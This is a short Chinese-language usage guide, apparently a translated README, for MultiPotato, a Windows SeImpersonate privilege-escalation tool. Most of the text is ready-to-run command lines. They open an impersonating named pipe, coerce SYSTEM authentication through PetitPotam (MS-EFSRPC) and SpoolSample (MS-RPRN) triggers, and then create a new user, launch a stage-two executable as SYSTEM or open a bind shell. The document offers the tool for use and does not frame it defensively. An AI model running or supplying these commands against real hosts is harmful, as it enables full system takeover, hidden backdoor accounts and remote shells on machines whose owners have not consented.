SeImpersonate 权限提升

MultiPotato

• 它不包含任何用于武器化的系统身份验证触发器。相反，该代码可用于自行集成您最喜欢的触发器。
• 它不仅CreateProcessWithTokenW用于生成新进程。相反，你可以选择CreateProcessWithTokenW，CreateProcessAsUserW，CreateUser和BindShell。

因此，该项目能够打开 NamedPipe 服务器，模拟连接到它的任何用户，然后执行上述选项之一。如果将来发布任何新的 SYSTEM auth 触发器，此工具仍可用于提升权限 - 在这种情况下，您只需要使用另一个 Pipe-Name。

例子：

1. 带有修改过的 PetitPotam 触发器的 CreateUser：

c:\temp\MultiPotato> MultiPotato.exe -t CreateUser

默认情况下，您有 60 秒的值（可通过THEAD_TIMEOUT 更改）以让 SYSTEM 帐户或任何其他帐户进行身份验证。例如，这可以通过未修补的 MS-EFSRPC 函数来完成。默认情况下，MultiPotato 侦听管道名称\\.\pipe\pwned/pipe/srvsvc，该名称旨在与 MS-EFSRPC 结合使用。对于其他 SYSTEM auth 触发器，您可以通过-p参数调整此值。

c:\temp\MultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost

使用PetitPotam.py有效的低特权用户作为远程系统的触发器当然也是可能的。

1. CreateProcessAsUserW 与 SpoolSample 触发器：

c:\temp\MultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

并通过触发它

c:\temp\MultiPotato>MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned

重要提示：在我对 MS-RPRN 的测试中，我不能使用 localhost 或 127.0.0.1 作为目标，这必须是网络 IP 地址或 FQDN。此外，需要启用打印机服务才能使其工作。

1. BindShell 与 SpoolSample PipeName

c:\temp\MultiPotato> MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"